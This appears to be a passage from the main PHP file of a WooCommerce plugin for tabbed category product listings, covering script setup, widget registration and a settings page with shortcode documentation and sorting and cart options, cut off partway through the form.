<?php
/*
* Plugin Name: Woo Tabbed Category Product Listing - Pro
* Plugin URI: https://www.quantumcloud.com/
* Description: WooCommerce addon to display Category based Product Listing in tab, accordion or carousel format on any page with a short code.
* Author: QuantumCloud
* Author URI: https://www.quantumcloud.com/
* Version: 10.1.4
* Requires at least: 4.6
* Tested up to: 6.5
* Text Domain: woo-tabbed-category
* License: GPL2
**/


if (!defined('WPINC')) {
    die;
}

if ( ! defined( 'WOO_PRODUCT_TAB_VERSION' ) ) {
    define('WOO_PRODUCT_TAB_VERSION', '2.5');
}
if ( ! defined( 'QC_WOO_TAB_PLUGIN_URL' ) ) {
    define('QC_WOO_TAB_PLUGIN_URL', plugin_dir_url(__FILE__));
}
if ( ! defined( 'QC_WOO_TAB_IMAGE_URL' ) ) {
    define('QC_WOO_TAB_IMAGE_URL', QC_WOO_TAB_PLUGIN_URL . "/images");
}
if ( ! defined( 'QC_WOO_TEMPLATE_PATH' ) ) {
    define('QC_WOO_TEMPLATE_PATH', QC_WOO_TAB_PLUGIN_URL . "templates");
}
if ( ! defined( 'QC_WOO_TAB_DIR' ) ) {
    define('QC_WOO_TAB_DIR', dirname(__FILE__));
}
if ( ! defined( 'QC_WOO_TAB_TEMPLATE_DIR' ) ) {
    define('QC_WOO_TAB_TEMPLATE_DIR', QC_WOO_TAB_DIR . "/templates");
}



add_action( 'plugins_loaded', 'qcld_woo_tab_load_textdomain' );
function qcld_woo_tab_load_textdomain() {
    load_plugin_textdomain( 'woo-tabbed-category', false, dirname( plugin_basename( QC_WOO_TAB_PLUGIN_URL ) ) . '/languages/' );
}

// For Ajax Call
require_once("qcld-wootab-product-details-modal.php");
require_once("woo-tabbed-ajax-theme-load-more-by-cat.php");
require_once("woo-tabbed-floating-cart.php");
require_once("woo-tabbed-feature-product-tab.php");
require_once("woo-tabbed-hot-deals-carousel.php");
require_once("woo-tabbed-all-category-show.php");
require_once("woo-tabbed-ajax-search.php");
require_once("woo-tabbed-sub-cat.php");
require_once("woo-tabbed-product-tag-ajax.php");
require_once("woo-tabbed-theme-default-ajax.php");
require_once("woo-tabbed-theme-twelve-ajax.php");
require_once("woo-tabbed-theme-thirteen-ajax.php");
require_once("woo-tabbed-template-query-function.php");
require_once("qc-support-promo-page/class-qc-support-promo-page.php");

require_once("plugin-upgrader/plugin-upgrader.php");

require_once "conversion-tracker/class-qc-conversion-tracker.php";


require_once('woo-tabbed-min-max-qty.php');
require_once('woo-tabbed-dynamic-discount-price.php');

add_action('wp_head', 'qcld_woo_tab_ajaxurl');
function qcld_woo_tab_ajaxurl()
{

    $qc_slick_rtl_support = ( get_option('qc_woo_tabbed_display_rtl_support') == 'enable' ) ? 'true' : 'false';

    $success_alert_message = get_option('success_alert_message') ? get_option('success_alert_message') : esc_html('Product Has Successfully Been Added To Your Cart !', 'woo-tabbed-category');
    $title_text = get_option('title_text') ? get_option('title_text') : esc_html('Good Job', 'woo-tabbed-category');
    $no_product_found_text = get_option('no_product_found_text') ? get_option('no_product_found_text') : esc_html('No product found!', 'woo-tabbed-category');
    $change_load_more_text = get_option('change_load_more_text') ? get_option('change_load_more_text') : esc_html('Load More', 'woo-tabbed-category');
    $add_to_cart_text = get_option('change_add_to_cart_button_text') ? get_option('change_add_to_cart_button_text') : esc_html('Add To Cart', 'woo-tabbed-category');
    $qcld_twelve_slick_slider_center_mode = get_option('qcld_twelve_slick_slider_center_mode');

    echo '<script type="text/javascript">
           var ajaxurl = "' . admin_url('admin-ajax.php') . '";
           var success_message = "' . $success_alert_message . '";
           var cart_option = "' . get_option('qc_add_to_cart_type') . '";
           var cart_page_url = "' . site_url() . '";
           var title_text = "' . esc_html($title_text, 'woo-tabbed-category') . '";
           var add_to_cart_text = "' . esc_html($add_to_cart_text, 'woo-tabbed-category') . '";
           
           var product_not_found_text = "' . esc_html($no_product_found_text, 'woo-tabbed-category') . '";
           var qc_eleven_parent_clickable = "' . get_option('qc_woo_tabbed_eleven_parent_category_clickable') . '";
           var qc_scroll_category_clickable = "' . get_option('qc_woo_tabbed_scroll_category_clickable') . '";
           var initial_product_number = "' . get_option('product_number') . '";
           var initial_hot_deals_product_number = "' . get_option('hot_deals_product_number') . '";
           var change_load_more_text = "' . esc_html($change_load_more_text, 'woo-tabbed-category') . '";
           
           var image_loader = "' . QC_WOO_TAB_IMAGE_URL . '/product-loader.gif";
           var currency_symbol = "' . get_woocommerce_currency_symbol() . '" ;
           var qc_woo_tabbed_cart_summary_position = "' . get_option('qc_woo_tabbed_cart_summary_position') . '";
           var qc_woo_tabbed_cart_summary_style = "' . get_option('qc_woo_tabbed_cart_summary_style') . '";
           var qcld_get_checkout_url = "' . wc_get_checkout_url(). '";
           var qcld_get_cart_url = "' . wc_get_cart_url(). '";
           var enable_alert_message = "' . get_option('qc_woo_tabbed_enable_product_alert_message_success') . '";
           var enable_alert_message_mobile = "' . get_option('qc_woo_tabbed_enable_product_alert_message_success_mobile') . '";
           var qcld_woo_tabbed_change_loading_image = "' . get_option('qcld_woo_tabbed_change_loading_image') . '";
           var qcld_twelve_slick_slider_number = "' . get_option('qcld_twelve_slick_slider_number') . '";
           var qcld_twelve_slick_slider_center_mode = "' . $qcld_twelve_slick_slider_center_mode . '";
           var qcld_woo_tabbed_board_bg_path = "' . get_option('qcld_woo_tabbed_board_bg_path') . '";
           var display_category_url_based = "' . get_option('qc_woo_tabbed_display_category_url_based') . '";
           var product_search_each_category = "' . get_option('qcld_product_search_box_each_category') . '";
           var qc_woo_tabbed_enable_product_variable_add_to_cart = "' . get_option('qc_woo_tabbed_enable_product_variable_add_to_cart') . '";
           var qcld_woo_tabbed_show_category_dropdown = "' . get_option('qcld_woo_tabbed_show_category_dropdown') . '";
           var qc_slick_rtl_support = "' . $qc_slick_rtl_support . '";
           var wiCartTotal = "' . WC()->cart->get_cart_contents_count() . '";
           
        </script>';
}


Class Woo_Tab_pro_Product_Category_List
{


    private $id = 'woo-tab';
    private static $instance;

    public static function get_instance()
    {
        if (!self::$instance) {
            self::$instance = new self();
            self::$instance->init();
        }

    }


    private function __construct(){

    }


    public function general_includes()
    {

        if (!class_exists('WooCommerce') || version_compare(get_option('woocommerce_db_version'), WOO_PRODUCT_TAB_VERSION, '<')) {
            add_action('admin_notices', array($this, 'woocommerce_inactive_notice'));
            return;
        } else {
            include_once 'includes/widgets/class-wc-widget-product-categories2.php';
        }


    }


    public function register_widgets()
    {
        if (!class_exists('WooCommerce') || version_compare(get_option('woocommerce_db_version'), WOO_PRODUCT_TAB_VERSION, '<')) {
            add_action('admin_notices', array($this, 'woocommerce_inactive_notice'));
            return;
        } else {
            register_widget('Woo_tabbed_WC_Widget_Product_Categories2');
        }


    }


    public function init()
    {
        //error_reporting(E_ALL ^ E_NOTICE);
        $this->general_includes();
        add_action('widgets_init', array($this, 'register_widgets'));

        add_action('admin_menu', array($this, 'admin_menu'));

        // Check if WooCommerce is active, and is required WooCommerce version.
        if (!class_exists('WooCommerce') || version_compare(get_option('woocommerce_db_version'), WOO_PRODUCT_TAB_VERSION, '<')) {
            add_action('admin_notices', array($this, 'woocommerce_inactive_notice'));
            return;
        }


        if ((!empty($_GET["page"])) && ($_GET["page"] == "woo-tab")) {

            add_action('admin_init', array($this, 'woo_tab_save_options'));
        }


    }


    public function admin_page()
    {
        $action = 'admin.php?page=woo-tab'; ?>
        
        <div class="wrap-header">
            <h1><?php esc_html_e( 'Woo Tab Pro Settings ', 'woo-tabbed-category' ); ?></h1>
        </div>


            <div class="qc_togglebox">
                <input id="toggle00000" type="radio" name="toggle"/>
                <label for="toggle00000"><?php esc_html_e( 'License', 'woo-tabbed-category' ); ?></label>
                <section id="content00000" class="wo_tabs_inner wo_tabs_inner_css">
                    <?php require_once("qc-woo-tabbed-help-license.php"); ?>
                </section>
            </div>

            <form action="<?php echo esc_attr($action); ?>" method="POST" enctype="multipart/form-data">
            <div class="qc_togglebox">
                <input id="toggle1" type="radio" name="toggle"/>
                <label for="toggle1"><?php esc_html_e( 'USAGE', 'woo-tabbed-category' ); ?></label>
                <section id="content1" class="wo_tabs_inner wo_tabs_inner_css">



                    <p><?php esc_html_e( 'Use the shortcode', 'woo-tabbed-category' ); ?> <input type="text" class="qcld-woo-shortcode-code qcld-width" name="" value="[wtcpl-product-cat]" readonly> <?php esc_html_e( 'inside any WordPress post or page to show
                        your products.', 'woo-tabbed-category' ); ?></p>

                    <p><?php esc_html_e( 'Optionally you can pass four parameters to it. They are:', 'woo-tabbed-category' ); ?></p>

                    <ul>
                        <li><?php esc_html_e( '1. Template to use', 'woo-tabbed-category' ); ?></li>
                        <li><?php esc_html_e( '2. Show only products that are on Sale', 'woo-tabbed-category' ); ?></li>
                        <li><?php esc_html_e( '3. Show only products that are Featured', 'woo-tabbed-category' ); ?></li>
                        <li><?php esc_html_e( '4. A list of category ids to display and order the filter buttons', 'woo-tabbed-category' ); ?></li>
                        <li><?php esc_html_e( '5. Show product tab mode', 'woo-tabbed-category' ); ?></li>
                    </ul>

                    <?php esc_html_e( 'Example:', 'woo-tabbed-category' ); ?>
                    <div class="shortcode-list">
                        <div> 
                            <p><?php esc_html_e( 'For specific theme. Example: theme="one", theme="two" ... ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="two"]' readonly>  
                        </div>
                        <div> 
                            <p><?php esc_html_e( 'For sale only products. Example: sale-only=1 ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="two" sale-only=1]' readonly> 
                        </div>
                        <div> 
                            <p><?php esc_html_e( 'For featured products. Example: featured-only=1 ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="two" featured-only=1]' readonly>  
                        </div>
                        <div> 
                            <p><?php esc_html_e( 'For best selling products. Example: best-selling=1 ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="two" best-selling=1]' readonly>  
                        </div>
                        <div> 
                            <p><?php esc_html_e( 'For specific category. Example: category-ids="78,102,39,98" See screenshot below for how to find the Category IDs ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="five" category-ids="78,102,39,98"]' readonly> 
                        </div>
                        <div> 
                            <p><?php esc_html_e( 'To add modal link with product title. Example: link_title_to_modal="1"  ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="five" link_title_to_modal="1"]' readonly>  
                        </div>
                        <div> 
                            <p><?php esc_html_e( 'To show category image with category tab button. Example: cat-image-on-top="on" ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="five" cat-image-on-top="on"]' readonly>  
                        </div>
                        <div> 
                            <p><?php esc_html_e( 'For slider tab mode on. Example: slider-tabs="on" ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="five" cat-image-on-top="on" slider-tabs="on"]' readonly>  
                        </div>
                        <div> 
                            <p><?php esc_html_e( ' To show filter section on top. Example: filter-on-top="on" ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="five" filter-on-top="on" cat-image-on-top="on" slider-tabs="on"]' readonly>  
                        </div>
                        
                        <div> 
                            <p><?php esc_html_e( 'To show category image with category button backgroud. Example: cat-image-on-bg="on" ', 'woo-tabbed-category' ); ?></p>
                            <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-product-cat theme="five" filter-on-top="on" cat-image-on-bg="on" slider-tabs="on"]' readonly>  
                        </div>
                    </div>

                    <strong><?php esc_html_e( 'When passing any optional parameter, you must specify theme name as the fist shortcode
                        parameter.', 'woo-tabbed-category' ); ?></strong>

                    <p><?php esc_html_e( 'There are 10 templates and you can pass them as theme="three", theme="four" etc.', 'woo-tabbed-category' ); ?></p>
                    <br>
                    <p><b><?php esc_html_e( 'Hot Deal Tabs:', 'woo-tabbed-category' ); ?></b></p>
                    <?php esc_html_e( 'Display Hot, New, Best Buy and Featured products with the following Shortcode on any page: ', 'woo-tabbed-category' ); ?><br>
                    <div class="shortcode-list">
                        <div> <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-hot-deals-tab]'>  </div>
                    </div>
                    <br>
                    <p><b><?php esc_html_e( 'Hot Deal Carousel:', 'woo-tabbed-category' ); ?></b></p>
                    <?php esc_html_e( 'Display Hot, New, Best Buy and Featured products with the following Shortcode on any page: ', 'woo-tabbed-category' ); ?><br>
                    <div class="shortcode-list">
                        <div> <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-hot-deals-carousel]'>  </div>
                    </div>
                    <br>
                    <p><b><?php esc_html_e( 'Display All Categories on a Page:', 'woo-tabbed-category' ); ?></b></p>
                    <?php esc_html_e( 'Show all the categories and sub categoires with the following Shortcode on any page: ', 'woo-tabbed-category' ); ?><br>
                    <div class="shortcode-list">
                        <div> <input type="text" class="qcld-woo-shortcode-code" name="" value='[wtcpl-all-category-show]'> </div>
                    </div>
                    <p><b><?php esc_html_e( 'Find the Category ID from url:', 'woo-tabbed-category' ); ?></b></p>
                    <?php esc_html_e( 'Please find out your category id from categories', 'woo-tabbed-category' ); ?><br>
                    <img src="<?php echo QC_WOO_TAB_IMAGE_URL; ?>/category-id.png" class="qcld_get_category_id" alt="">

                  
                </section>
                <input id="toggle2" type="radio" name="toggle"/>
                <label for="toggle2"><?php esc_html_e( 'General Settings', 'woo-tabbed-category' ); ?></label>
                <section id="content2" class="wo_tabs_inner">
                    <div class="admin_display_list admin_display_list_bg admin_display_list_full">
                        <p><?php esc_html_e( 'Select categories which you want to exclude', 'woo-tabbed-category' ); ?></p>
                        <?php $product_categories = get_terms('product_cat'); ?>
                        <?php $selected_categories = unserialize(get_option('selected_categories')); ?>
                        <select name="selected_categories[]" id="categories" multiple="multiple">
                            <option value="">None</option>
                            <?php if ($selected_categories != ''): ?>
                                <?php foreach ($selected_categories as $category) {
                                    if ($term = get_term_by('id', $category, 'product_cat')) { ?>
                                        <option value="<?php echo $category; ?>"
                                                selected="selected"><?php echo $term->name; ?></option>
                                    <?php }
                                }
                                ?>
                            <?php endif; ?>
                            <?php foreach ($product_categories as $cats): ?>
                                <option value="<?php echo $cats->term_id; ?>"><?php echo $cats->name; ?></option>
                            <?php endforeach; ?>
                        </select>
                    </div>

                    <div class="admin_display_list admin_display_list_bg admin_display_list_full">

                        <p><?php esc_html_e( 'Add to cart button behavior', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_add_to_cart_type" <?php echo(get_option('qc_add_to_cart_type') == 'ajax' ? 'checked' : ''); ?>
                                       value="ajax">
                                <?php esc_html_e( 'AJAX', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_add_to_cart_type" <?php echo(get_option('qc_add_to_cart_type') == 'cart_page' ? 'checked' : ''); ?>
                                       value="cart_page">
                                <?php esc_html_e( 'Redirect to Cart Page', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                       
                    </div>


                    <div class="admin_display_list admin_display_list_bg admin_display_list_short_4">

                        <p><?php esc_html_e( 'Sort product by', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_product_sort_type" <?php echo(get_option('qc_product_sort_type') == 'menu_order title' ? 'checked' : ''); ?>
                                       value="menu_order title">
                                <?php esc_html_e( 'Menu Order', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_product_sort_type" <?php echo(get_option('qc_product_sort_type') == 'title' ? 'checked' : ''); ?>
                                       value="title">
                                <?php esc_html_e( 'Title', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_product_sort_type" <?php echo(get_option('qc_product_sort_type') == 'date' ? 'checked' : ''); ?>
                                       value="date">
                                <?php esc_html_e( 'Date', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_product_sort_type" <?php echo(get_option('qc_product_sort_type') == 'meta_value_num' ? 'checked' : ''); ?>
                                       value="meta_value_num">
                                <?php esc_html_e( 'Price', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_product_sort_type" <?php echo(get_option('qc_product_sort_type') == 'total_sales' ? 'checked' : ''); ?>
                                       value="total_sales">
                                <?php esc_html_e( 'Best Seller', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Sort Category ', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list woo_menu_orders">
                            <li>
                                <input type="radio"
                                       name="category_order" <?php echo(get_option('category_order') == 'asc' ? 'checked' : ''); ?>
                                       value="asc">
                                <?php esc_html_e( 'By Title Ascending ', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="category_order" <?php echo(get_option('category_order') == 'desc' ? 'checked' : ''); ?>
                                       value="desc">
                                <?php esc_html_e( 'By Title Descending', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="category_order" <?php echo(get_option('category_order') == 'menu_order' ? 'checked' : ''); ?>
                                       value="menu_order">
                                <?php esc_html_e( 'Menu Order', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>


                    <div class="admin_display_list admin_display_list_bg">


                        <p><?php esc_html_e( 'Product sorting order', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_product_sort_order" <?php echo(get_option('qc_product_sort_order') == 'asc' ? 'checked' : ''); ?>
                                       value="asc">
                                <?php esc_html_e( 'Ascending', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_product_sort_order" <?php echo(get_option('qc_product_sort_order') == 'desc' ? 'checked' : ''); ?>
                                       value="desc">
                                <?php esc_html_e( 'Descending', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Enable Front End Sorting', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_quick_sorting_on_off" <?php echo(get_option('qc_quick_sorting_on_off') == 'on' ? 'checked' : ''); ?>
                                       value="on">
                                <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_quick_sorting_on_off" <?php echo(get_option('qc_quick_sorting_on_off') == 'off' ? 'checked' : ''); ?>
                                       value="off">
                                <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Number of products in each category', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_number" id="product_number" style="margin-top: 9px;"
                               value="<?php echo get_option('product_number'); ?>"/>
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Number of letters allowed per category name', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="max_char_per_cat"
                               value="<?php echo get_option('max_char_per_cat'); ?>">
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Category Slider item show desktop', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="qcld_slick_slider_number"
                               value="<?php echo get_option('qcld_slick_slider_number'); ?>">
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Category Slider item show mobile', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="qcld_slick_slider_number_mobile"
                               value="<?php echo get_option('qcld_slick_slider_number_mobile'); ?>">
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Twelve Theme Slider item show', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="qcld_twelve_slick_slider_number"
                               value="<?php echo get_option('qcld_twelve_slick_slider_number') ? get_option('qcld_twelve_slick_slider_number') : 4; ?>">
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p><?php esc_html_e( 'Twelve Theme Slider Center Mode ', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qcld_twelve_slick_slider_center_mode" <?php echo(get_option('qcld_twelve_slick_slider_center_mode') == 'enable' ? 'checked' : ''); ?> value="enable"> <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qcld_twelve_slick_slider_center_mode" <?php echo(get_option('qcld_twelve_slick_slider_center_mode') == '' ? 'checked' : ''); ?> value=""> <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?> </li>

                        </ul>

                       
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p><?php esc_html_e( 'Enable Quick Cart', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_woo_tabbed_cart_summary_style" <?php echo(get_option('qc_woo_tabbed_cart_summary_style') == 'on' ? 'checked' : ''); ?>
                                       value="on">
                                <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_woo_tabbed_cart_summary_style" <?php echo(get_option('qc_woo_tabbed_cart_summary_style') == 'off' ? 'checked' : ''); ?>
                                       value="off">
                                <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                        <span class="woo_tabbed_woo_msg"><?php esc_html_e( 'If you disable quick cart please select the Woo Instant Cart & Checkout Right Float option. Otherwise, the Add to Cart may not work properly.', 'woo-tabbed-category' ); ?></span>

                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p class="float_cart_pos"><?php esc_html_e( 'Floating Quick Cart Position', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_cart_summary_position" <?php echo(get_option('qc_woo_tabbed_cart_summary_position') == 'leftfloat' ? 'checked' : ''); ?> value="leftfloat">  <?php esc_html_e( 'Show Left', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_cart_summary_position" <?php echo(get_option('qc_woo_tabbed_cart_summary_position') == 'rightfloat' ? 'checked' : ''); ?> value="rightfloat"> <?php esc_html_e( 'Show Right', 'woo-tabbed-category' ); ?></li>
                            <li style="width: 100% !important;padding-top:3px"><input type="radio" name="qc_woo_tabbed_cart_summary_position" <?php echo(get_option('qc_woo_tabbed_cart_summary_position') == 'wooinstantcart' ? 'checked' : ''); ?> value="wooinstantcart"> <?php esc_html_e( 'Woo Instant Cart & Checkout Right Float ', 'woo-tabbed-category' ); ?></li>
                        </ul>
                        <span class="woo_tabbed_woo_msg"><?php esc_html_e( 'If you select woo instant cart it will enable Ajax add to cart globally.', 'woo-tabbed-category' ); ?></span>

                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p><?php esc_html_e( 'Enable Dropdown for Sub Category (not supported in theme 10) ', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_enable_dropdown_menu_tab" <?php echo(get_option('qc_woo_tabbed_enable_dropdown_menu_tab') == 'enable' ? 'checked' : ''); ?> value="enable"> <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_enable_dropdown_menu_tab" <?php echo(get_option('qc_woo_tabbed_enable_dropdown_menu_tab') == '' ? 'checked' : ''); ?> value=""> <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?> </li>

                        </ul>

                       
                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <div class="admin_display_list" style="width:80%">
                            <p><?php esc_html_e( 'Number of hot deal products to show in each Tab', 'woo-tabbed-category' ); ?></p>
                            <input type="text" name="hot_deals_product_number" id="hot_deals_product_number" style="margin-top: 9px;"
                               value="<?php echo get_option('hot_deals_product_number'); ?>"/>
                        </div>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Category menu button top tooltip show for category description', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qcld_category_top_tooltip_show" <?php echo(get_option('qcld_category_top_tooltip_show') == 'enable' ? 'checked' : ''); ?> value="enable"> <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?> </li>
                            <li><input type="radio" name="qcld_category_top_tooltip_show" <?php echo(get_option('qcld_category_top_tooltip_show') == '' ? 'checked' : ''); ?> value=""> <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?> </li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p><?php esc_html_e( 'Product Search Form for quick search product', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qcld_product_search_box_for_quick_search" <?php echo(get_option('qcld_product_search_box_for_quick_search') == 'enable' ? 'checked' : ''); ?> value="enable"> <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?> </li>
                            <li><input type="radio" name="qcld_product_search_box_for_quick_search" <?php echo(get_option('qcld_product_search_box_for_quick_search') == '' ? 'checked' : ''); ?> value=""> <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?> </li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p><?php esc_html_e( 'Quick search product only under selected category', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qcld_product_search_box_each_category" <?php echo(get_option('qcld_product_search_box_each_category') == 'enable' ? 'checked' : ''); ?> value="enable"> <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?> </li>
                            <li><input type="radio" name="qcld_product_search_box_each_category" <?php echo(get_option('qcld_product_search_box_each_category') == '' ? 'checked' : ''); ?> value=""> <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?> </li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p><?php esc_html_e( 'Products Loading Style', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_woo_tabbed_product_loading_style" <?php echo(get_option('qc_woo_tabbed_product_loading_style') == 'on' ? 'checked' : ''); ?>
                                       value="on">
                                <?php esc_html_e( 'Load More', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_woo_tabbed_product_loading_style" <?php echo(get_option('qc_woo_tabbed_product_loading_style') == 'infinite' ? 'checked' : ''); ?>
                                       value="infinite">
                                <?php esc_html_e( 'Infinite Scrolling', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Default Theme Column Number', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="qcld_default_theme_column_number"
                               value="<?php echo get_option('qcld_default_theme_column_number') ? get_option('qcld_default_theme_column_number') : 4; ?>">
                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        <p><input id="show_all" type="checkbox" name="show_all"
                               value="1" <?php echo(get_option('show_all') == '1' ? 'checked' : ''); ?>>
                        <?php esc_html_e( 'Enable "All" tab', 'woo-tabbed-category' ); ?></p>
                    </div>

                    <div class="admin_display_list admin_display_list_bg"  style="display: block">
                        
                        <p><?php esc_html_e( 'Floating Quick Cart Display', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li style="width:35%"><label><input type="radio" class="qc_woo_tabbed_cart_show_page" name="qc_woo_tabbed_cart_show_page" <?php echo(get_option('qc_woo_tabbed_cart_show_page') == 'single' ? 'checked' : ''); ?> value="single"> <?php esc_html_e( 'Only on Woo tabbed page', 'woo-tabbed-category' ); ?></label></li>
                            <li style="width:20%"><label><input type="radio" class="qc_woo_tabbed_cart_show_page" name="qc_woo_tabbed_cart_show_page" <?php echo(get_option('qc_woo_tabbed_cart_show_page') == 'global' ? 'checked' : ''); ?> value="global"> <?php esc_html_e( 'All Pages ', 'woo-tabbed-category' ); ?></label></li> 
                            <li  style="width:40%">
                                <label>
                                <input class="qc_woo_tabbed_cart_show_page" type="radio"
                                       name="qc_woo_tabbed_cart_show_page"
                                       value="selected" <?php echo(get_option('qc_woo_tabbed_cart_show_page') == 'selected' ? 'checked' : ''); ?>>
                                <?php  esc_html_e( 'Selected Pages Only', 'woo-tabbed-category' ); ?></label></li>

                                <div id="qc_woo_tabbed-show-pages-list">
                                <ul class="checkbox-list">
                                    <?php
                                    $qc_woo_tabbed_pages = get_pages();
                                    $qc_woo_tabbed_select_pages = unserialize(get_option('qc_woo_tabbed_cart_show_pages_list'));
                                    if(empty($qc_woo_tabbed_select_pages)){
                                     $qc_woo_tabbed_select_pages = array();
                                    }
                                    foreach ($qc_woo_tabbed_pages as $qc_woo_tabbed_page) {
                                        ?>
                                        <li>
                                            <input id="qc_woo_tabbed_page_<?php echo $qc_woo_tabbed_page->ID; ?>"
                                                   type="checkbox"
                                                   name="qc_woo_tabbed_cart_show_pages_list[]"
                                                   value="<?php echo esc_attr($qc_woo_tabbed_page->ID); ?>" <?php echo(in_array($qc_woo_tabbed_page->ID, $qc_woo_tabbed_select_pages) == true ? 'checked' : ''); ?> >
